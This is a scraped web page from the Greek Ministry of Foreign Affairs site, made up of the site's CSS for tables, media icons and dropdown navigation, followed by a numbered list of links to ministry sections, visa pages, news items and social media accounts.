- table.pinakas tr:hover td {
- background-color : #eaedf2;
- color : #bf1919;
- cursor : default;
- }
- table.pinakasvisas {
- margin : 10px 0;
- padding : 0;
- width : 100%;
- border : #b7d3eb solid 1px;
- border-collapse : collapse;
- font-size : 0.95em;
- text-align : left;
- }
- table.pinakasvisas td {
- background-color : #f8f8f8;
- color : #333;
- padding : 0 2px;
- border : #b7d3eb solid 1px;
- }
- table.pinakasvisas tr:hover td {
- background-color : #eaedf2;
- color : #bf1919;
- cursor : default;
- }
- table.media_table {
- margin : 4px 0;
- padding : 0;
- width : 100%;
- border-collapse : collapse;
- font-size : 0.95em;
- text-align : justify;
- }
- table.media_table td {
- vertical-align : top;
- padding : 0 5px;
- }
- .phone {
- background : url(../images/phone.png) 0% 0% no-repeat transparent;
- padding : 5px 0 6px 28px;
- line-height : 30px;
- }
- .email {
- background : url(../images/email.png) 0% 0% no-repeat transparent;
- padding : 5px 0 6px 28px;
- line-height : 30px;
- }
- .sound_media, a.sound_media, a.sound_media:link, a.sound_media:active, a.sound_media:hover, a.sound_media:visited {
- background : url(../images/sound_media.png) 0% 0% no-repeat transparent;
- padding : 10px 0 10px 36px;
- line-height : 32px;
- text-decoration : none;
- color : #2191c5;
- }
- a.sound_media:hover {
- color : #ff9900;
- }
- .video_media, a.video_media, a.video_media:link, a.video_media:active, a.video_media:hover, a.video_media:visited {
- background : url(../images/video_media.png) 0% 0% no-repeat transparent;
- padding : 10px 0 10px 36px;
- line-height : 32px;
- text-decoration : none;
- color : #2191c5;
- }
- a.video_media:hover {
- color : #ff9900;
- }
- .photo_media, a.photo_media, a.photo_media:link, a.photo_media:active, a.photo_media:hover, a.photo_media:visited {
- background : url(../images/photo_media.png) 0% 0% no-repeat transparent;
- padding : 10px 0 10px 36px;
- line-height : 32px;
- text-decoration : none;
- color : #2191c5;
- }
- a.photo_media:hover {
- color : #ff9900;
- }
- span.periehomena {
- background : url(../images/book.png) 50% 8px no-repeat #f8f8f8;
- padding : 8px 8px 8px 30px;
- border-top : 1px dotted #dddddd;
- border-bottom : 1px dotted #dddddd;
- }
- .pdf_doclink, a.pdf_doclink, a.pdf_doclink:link, a.pdf_doclink:active, a.pdf_doclink:hover, a.pdf_doclink:visited {
- background : url(../images/pdf_button.png) 0% 0% no-repeat transparent;
- padding : 1px 0 2px 20px;
- text-decoration : none;
- color : #2191c5;
- }
- a.pdf_doclink:hover {
- color : #ff9900;
- }
- .rtf_doclink, a.rtf_doclink, a.rtf_doclink:link, a.rtf_doclink:active, a.rtf_doclink:hover, a.rtf_doclink:visited {
- background : url(../images/rtf_button.png) 0% 0% no-repeat transparent;
- padding : 1px 0 2px 20px;
- text-decoration : none;
- color : #2191c5;
- }
- a.rtf_doclink:hover {
- color : #ff9900;
- }
- .contact_link, a.contact_link, a.contact_link:link, a.contact_link:active, a.contact_link:hover, a.contact_link:visited {
- background : url(../images/emailButton.png) 0% 0% no-repeat transparent;
- padding : 1px 0 2px 20px;
- text-decoration : none;
- color : #2191c5;
- }
- a.contact_link:hover {
- color : #ff9900;
- }
- p.roundbox-head {
- font-size : 1em;
- margin : 1em 0;
- padding : 8px;
- background-color : #e9f0f8;
- border : #ddd solid 1px;
- color : #222;
- }
- p.roundbox {
- font-size : 1em;
- margin : 1em 0;
- padding : 8px;
- background-color : #f8f8f8;
- border : #ddd solid 1px;
- color : #222;
- }
- .moduletable-round {
- font-size : 1em;
- margin : 0 5px;
- padding : 0;
- background-color : #fafaff;
- border : #adadad solid 1px;
- color : #222;
- }
- .navigation ul {
- overflow : visible;
- }
- ul.mainlevel-hnav {
- float : left;
- list-style : none;
- line-height : 28px;
- background-color : #124175;
- font-weight : bold;
- padding : 0;
- margin : 0;
- }
- ul.mainlevel-hnav ul {
- float : left;
- list-style : none;
- background-color : #f7f8f9;
- font-weight : bold;
- padding : 0;
- margin : 0;
- border-bottom : 1px solid #05a9f5;
- border-right : 1px solid #05a9f5;
- border-left : 1px solid #05a9f5;
- }
- ul.mainlevel-hnav a, ul.mainlevel-hnav a:link, ul.mainlevel-hnav a:visited {
- display : block;
- font-family : Tahoma, Verdana, Arial, Geneva, Helveticaz;
- font-size : 0.92em;
- font-weight : normal;
- color : #89d8fd;
- text-decoration : none;
- margin : 0;
- padding : 0.55em 0.56em;
- border-right : 1px solid #1a558d;
- font-weight : bold;
- }
- ul.mainlevel-hnav a:hover {
- text-decoration : underline;
- color : #104074;
- }
- ul.mainlevel-hnav ul a:hover {
- color : #104074;
- text-decoration : underline;
- }
- ul.mainlevel-hnav ul li a, ul.mainlevel-hnav ul li a:link, ul.mainlevel-hnav ul li a:visited {
- color : #104074;
- border-right : 0 solid #f2f6fe;
- }
- ul.mainlevel-hnav ul li a:hover {
- color : #104074;
- text-decoration : underline;
- border-right : 0 solid #f2f6fe;
- }
- ul.mainlevel-hnav ul li li a, ul.mainlevel-hnav ul li li a:link, ul.mainlevel-hnav ul li li a:visited {
- color : #104074;
- border-right : 0 solid #f2f6fe;
- }
- ul.mainlevel-hnav ul li li a:hover {
- color : #104074;
- text-decoration : underline;
- border-right : 0 solid #f2f6fe;
- }
- ul.mainlevel-hnav a.suckerhdaddy, ul.mainlevel-hnav a.suckerhdaddy:link, ul.mainlevel-hnav a.suckerhdaddy:visited {
- background : url(suckerarrow.gif) 50% 100% no-repeat;
- color : #104074;
- }
- ul.mainlevel-hnav a.suckerhdaddy:hover {
- text-decoration : underline;
- color : #104074;
- }
- ul.mainlevel-hnav li {
- float : left;
- padding : 0;
- margin : 0;
- }
- ul.mainlevel-hnav li ul {
- position : absolute;
- left : -999em;
- height : auto;
- width : 22.4em;
- width : 22.6em;
- font-weight : bold;
- margin : 0 0 0 -1px;
- }
- ul.mainlevel-hnav li li {
- width : 100%;
- display : block;
- overflow : visible;
- margin : 0;
- padding : 0;
- }
- ul.mainlevel-hnav li ul ul {
- margin : -28px 0 0 22.6em;
- }
- ul.mainlevel-hnav li:hover ul ul, ul.mainlevel-hnav li:hover ul ul ul, ul.mainlevel-hnav li.sfhover ul ul, ul.mainlevel-hnav li.sfhover ul ul ul {
- left : -999em;
- }
- ul.mainlevel-hnav li:hover ul, ul.mainlevel-hnav li li:hover ul, ul.mainlevel-hnav li li li:hover ul, ul.mainlevel-hnav li.sfhover ul, ul.mainlevel-hnav li li.sfhover ul, ul.mainlevel-hnav li li li.sfhover ul {
- left : auto;
- }
- ul.mainlevel-hnav li:hover ul ul ul ul, ul.mainlevel-hnav li.sfhover ul ul ul ul {
- left : -999em;
- }
- ul.mainlevel-hnav li li li li:hover ul, ul.mainlevel-hnav li li li li.sfhover ul {
- left : auto;
- }
- ul.mainlevel-hnav li:hover ul ul ul ul ul, ul.mainlevel-hnav li.sfhover ul ul ul ul ul {
- left : -999em;
- }
- ul.mainlevel-hnav li li li li li:hover ul, ul.mainlevel-hnav li li li li li.sfhover ul {
- left : auto;
- }
- ul.mainlevel-hnav li:hover, ul.mainlevel-hnav li.sfhover {
- background-color : #e9f3fd;
- }
- In our tests, we found downloads on this site were free of adware, spyware, and other potentially unwanted programs.
- View detailed analysis
- Submit a download for analysis
- Sitemap: http://www.mfa.gr/google.xml
- 1. http://www.mfa.gr/cache/rss20-greek.xml
- 2. http://www.mfa.gr/
- 3. http://www.mfa.gr/
- 4. http://www.mfa.gr/en/
- 5. http://www.mfa.gr/fr/
- 6. http://www.mfa.gr/
- 7. http://www.mfa.gr/to-ypourgeio/
- 8. http://www.mfa.gr/igesia/
- 9. http://www.mfa.gr/igesia/ypourgos/o-ypourgos.html
- 10. http://www.mfa.gr/igesia/yfypourgoi/
- 11. http://www.mfa.gr/igesia/genikoi-grammateis/o-genikos-grammateas.html
- 12. http://www.mfa.gr/igesia/genikoi-grammateis/genikos-grammateas-dos-as.html
- 13. http://www.mfa.gr/igesia/genikoi-grammateis/eidike-grammateas-axiopoieses-diethnon-programmaton.html
- 14. http://www.mfa.gr/domi.html
- 15. http://www.mfa.gr/to-ypourgeio/domi/apostoli-kai-armodiotites.html
- 16. http://www.mfa.gr/to-ypourgeio/stelehosi-ypex/
- 17. http://www.mfa.gr/to-ypourgeio/domi/monada-diaheirisis-kriseon.html
- 18. http://www.mfa.gr/to-ypourgeio/diplomatiki-akademia/
- 19. http://www.mfa.gr/to-ypourgeio/domi/ydas.html
- 20. http://www.mfa.gr/diplomatiko-kai-istoriko-arheio/
- 21. http://www.mfa.gr/to-ypourgeio/domi/kas.html
- 22. http://www.mfa.gr/to-ypourgeio/domi/grafeio-proothisis-ellinikon-ypopsifiotiton-se-diethneis-kai-yperethnikous-organismous.html
- 23. http://www.mfa.gr/epopteuomenoi-organismoi/
- 24. http://www.mfa.gr/to-ypourgeio/istoria/oi-egkatastaseis-tou-ypourgeiou-exoterikon.html
- 25. http://www.mfa.gr/to-ypourgeio/diethneis-symvaseis/
- 26. http://www.mfa.gr/organismos-ypex/
- 27. http://www.mfa.gr/exoteriki-politiki/
- 28. http://www.mfa.gr/dimereis-sheseis-tis-ellados.html
- 29. http://www.mfa.gr/eidika-themata-exoterikis-politikis/
- 30. http://www.mfa.gr/zitimata-ellinotourkikon-sheseon/
- 31. http://www.mfa.gr/kypriako/
- 32. http://www.mfa.gr/to-zitima-tou-onomatos-tis-pgdm/
- 33. http://www.mfa.gr/exoteriki-politiki/periferiaki-politiki/
- 34. http://www.mfa.gr/exoteriki-politiki/periferiaki-politiki/dytika-valkania.html
- 35. http://www.mfa.gr/exoteriki-politiki/periferiaki-politiki/mesogeios.html
- 36. http://www.mfa.gr/exoteriki-politiki/periferiaki-politiki/mesi-anatoli.html
- 37. http://www.mfa.gr/exoteriki-politiki/periferiaki-politiki/eyxeinos-pontos.html
- 38. http://www.mfa.gr/exoteriki-politiki/i-ellada-stin-ee/
- 39. http://www.mfa.gr/exoteriki-politiki/i-ellada-stous-diethneis-organismous/
- 40. http://www.mfa.gr/exoteriki-politiki/pagkosmia-zitimata/
- 41. http://www.mfa.gr/vouli-kai-exoteriki-politiki/
- 42. http://www.mfa.gr/omilies/
- 43. http://www.mfa.gr/koinovouleutikos-eleghos/
- 44. http://www.mfa.gr/exoteriki-politiki/ethniko-symvoulio-exoterikis-politikis/
- 45. http://www.mfa.gr/epikairotita/
- 46. http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/
- 47. http://www.mfa.gr/epikairotita/proto-thema/
- 48. http://www.mfa.gr/epikairotita/enimerosi-syntakton/
- 49. http://www.mfa.gr/epikairotita/diloseis-omilies/
- 50. http://www.mfa.gr/polymesa/
- 51. http://www.mfa.gr/polymesa/video/video-ypex.html
- 52. http://www.mfa.gr/polymesa/photographies/
- 53. http://www.mfa.gr/polymesa/ihitika/
- 54. http://www.mfa.gr/arheio-epikairotitas.html
- 55. http://www.mfa.gr/ypiresies/
- 56. http://www.mfa.gr/ypiresies-gia-ton-politi/
- 57. http://www.mfa.gr/kep-politon-kai-apodimon-ellinon.html
- 58. http://www.mfa.gr/ypiresies-gia-ton-politi/metafrastiki-ypiresia/i-metaphrastiki-ypiresia.html
- 59. http://www.mfa.gr/ypiresies-gia-ton-politi/dioikitikes-ypotheseis/
- 60. http://www.mfa.gr/ypiresies-gia-ton-politi/dikastikes-ypotheseis/
- 61. http://www.mfa.gr/ypiresies-gia-ton-politi/naytiliakes-ypotheseis/
- 62. http://www.mfa.gr/proxeniki-syndromi.html
- 63. http://www.mfa.gr/theoriseis-eisodou-visas/
- 64. http://www.mfa.gr/theoriseis-eisodou-visas/eidi-theoriseon/ethnikes-theoriseis.html
- 65. http://www.mfa.gr/theoriseis-eisodou-visas/theoriseis-schengen/
- 66. http://www.mfa.gr/theoriseis-eisodou-visas/theoriseis-gia-allodapous-pou-taxidevoun-stin-ellada/
- 67. http://www.mfa.gr/theoriseis-eisodou-visas/theoriseis-gia-ellines-pou-taxidevoun-sto-exoteriko/
- 68. http://www.mfa.gr/ypiresies-gia-epiheiriseis/
- 69. http://www.mfa.gr/ypiresies-gia-epiheiriseis/ypiresies-gia-exostrefeis-epiheiriseis/
- 70. http://www.mfa.gr/ypiresies-gia-epiheiriseis/dimosioi-diagonismoi-diavouleyseis/
- 71. http://www.mfa.gr/eykairies-stadiodromias/
- 72. http://www.mfa.gr/dinatotites-epaggelmatikis-stadiodromias-sto-ypex/
- 73. http://www.mfa.gr/eykairies-stadiodromias/epaggelmatiki-stadiodromia-se-diethneis-organismous/
- 74. http://www.mfa.gr/prokirixeis-theseon-dep/
- 75. http://www.mfa.gr/ethelontismos.html
- 76. http://www.mfa.gr/contact/mfa-el-contacts/ypourgeio-exoterikon.html
- 77. http://www.mfa.gr/katalogos.html
- 78. http://www.mfa.gr/appendix/dimereis-sheseis-tis-ellados/alpha.html
- 79. http://www.mfa.gr/xenes-arhes-stin-ellada.html
- 80. http://www.mfa.gr/#fragment-1
- 81. http://www.mfa.gr/#fragment-2
- 82. http://www.mfa.gr/#fragment-3
- 83. http://www.mfa.gr/#fragment-4
- 84. http://www.mfa.gr/epikairotita/proto-thema/sunantese-upeks-abramopoulou-me-presbeis-arabikon-khoron-2.html
- 85. http://www.youtube.com/watch?v=Fml5906BXkc
- 86. http://www.mfa.gr/epikairotita/proto-thema/deloseis-upeks-abramopoulou-kai-upeks-mexikou-pe-candellano-meta-te-sunantese-tous.html
- 87. http://www.youtube.com/watch?v=u8886i9_u70
- 88. http://www.mfa.gr/epikairotita/proto-thema/deloseis-upeks-abramopoulou-kai-upourgou-tourismou-kephalogianne.html
- 89. http://www.youtube.com/watch?v=GftXlAj8WjA&feature=youtu.be
- 90. http://www.mfa.gr/epikairotita/proto-thema/sunantese-upeks-abramopoulou-me-upourgo-europaikon-upotheseon-kai-exoterikou-emporiou-tes-phinlandias-stubb.html
- 91. http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/epikoinonia-tou-upeks-abramopoulou-me-to-neo-eidiko-entetalmeno-tes-ee-gia-ta-anthropina-dikaiomata-st-lamprinide.html
- 92. http://www.mfa.gr/epikairotita/diloseis-omilies/apantese-tou-ekprosopou-upeks-se-eroteseis-skhetika-me-anakoinothen-grapheiou-prothupourgou-pgdm.html
- 93. http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/anakoinose-gia-pragmatopoietheisa-sunantese-upeks-abramopoulou-me-presbe-serbias.html
- 94. http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/anakoinose-gia-pragmatopoietheisa-sunantese-upeks-abramopoulou-me-presbe-israel.html
- 95. http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/sunantese-ellena-diapragmateute-gia-to-thema-tes-onomasias-tes-pgdm-presbe-ad-basilake-me-prosopiko-apestalmeno-ggee-nimetz.html
- 96. http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/summetokhe-uphupeks-kourkoula-se-sumboulia-exoterikon-upotheseon-kai-genikon-upotheseon-2.html
- 97. http://www.mfa.gr/eykairies-stadiodromias/
- 98. http://www.mfa.gr/ypiresies-gia-ton-politi/
- 99. http://www.mfa.gr/ypiresies-gia-epiheiriseis/ypiresies-gia-exostrefeis-epiheiriseis/
- 100. http://www.mfa.gr/theoriseis-eisodou-visas/
- 101. http://www.mfa.gr/stoiheia-epikoinonias.html
- 102. http://www.mfa.gr/proxeniki-syndromi.html
- 103. http://www.mfa.gr/ypiresies-gia-epiheiriseis/dimosioi-diagonismoi-diavouleyseis/
- 104. http://sites.diavgeia.gov.gr/mfa
- 105. http://www.facebook.com/mfa.gr
- 106. http://www.flickr.com/photos/GreeceMFA
- 107. http://twitter.com/greecemfa
- 108. http://www.youtube.com/user/GreeceMFA
- 109. http://www.mfa.gr/rss/rss20.xml
- 110. http://www.mfa.gr/to-ypourgeio/
- 111. http://www.mfa.gr/igesia/
- 112. http://www.mfa.gr/domi.html
- 113. http://www.mfa.gr/epopteuomenoi-organismoi/
- 114. http://www.mfa.gr/to-ypourgeio/istoria/oi-egkatastaseis-tou-ypourgeiou-exoterikon.html
- 115. http://www.mfa.gr/to-ypourgeio/diethneis-symvaseis/
- 116. http://www.mfa.gr/organismos-ypex/
- 117. http://www.mfa.gr/exoteriki-politiki/
- 118. http://www.mfa.gr/dimereis-sheseis-tis-ellados.html
- 119. http://www.mfa.gr/eidika-themata-exoterikis-politikis/
- 120. http://www.mfa.gr/exoteriki-politiki/periferiaki-politiki/
- 121. http://www.mfa.gr/exoteriki-politiki/i-ellada-stin-ee/
- 122. http://www.mfa.gr/exoteriki-politiki/i-ellada-stous-diethneis-organismous/
- 123. http://www.mfa.gr/exoteriki-politiki/pagkosmia-zitimata/
- 124. http://www.mfa.gr/vouli-kai-exoteriki-politiki/
- 125. http://www.mfa.gr/exoteriki-politiki/ethniko-symvoulio-exoterikis-politikis/
- 126. http://www.mfa.gr/epikairotita/
- 127. http://www.mfa.gr/epikairotita/eidiseis-anakoinoseis/
- 128. http://www.mfa.gr/epikairotita/proto-thema/
- 129. http://www.mfa.gr/epikairotita/enimerosi-syntakton/
- 130. http://www.mfa.gr/epikairotita/diloseis-omilies/
- 131. http://www.mfa.gr/polymesa/
- 132. http://www.mfa.gr/arheio-epikairotitas.html
- 133. http://www.mfa.gr/ypiresies/
- 134. http://www.mfa.gr/ypiresies-gia-ton-politi/
- 135. http://www.mfa.gr/theoriseis-eisodou-visas/
- 136. http://www.mfa.gr/ypiresies-gia-epiheiriseis/
- 137. http://www.mfa.gr/eykairies-stadiodromias/
- 138. http://www.mfa.gr/ethelontismos.html
- 139. http://www.mfa.gr/contact/mfa-el-contacts/ypourgeio-exoterikon.html
- 140. http://www.mfa.gr/katalogos.html
- 141. http://www.mfa.gr/appendix/dimereis-sheseis-tis-ellados/alpha.html
- 142. http://www.mfa.gr/xenes-arhes-stin-ellada.html
- 143. http://www.mfa.gr/
- 144. http://www.mfa.gr/sitemap/
- 145. http://www.mfa.gr/search.html
- 146. http://www.mfa.gr/oroi-hrisis.html
- 147. http://www.mfa.gr/links/diadiktiakoi-topoi-ypex/
- 148. http://www.mfa.gr/contact/mfa-el-contacts/ypourgeio-exoterikon.html
- 149. javascript:void(null);
- 150. http://www.elxis.org/